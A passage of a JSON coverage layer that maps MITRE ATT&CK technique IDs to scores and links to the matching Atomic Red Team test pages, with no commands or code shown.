Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":75,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":23,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":59,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":76,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":38,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View 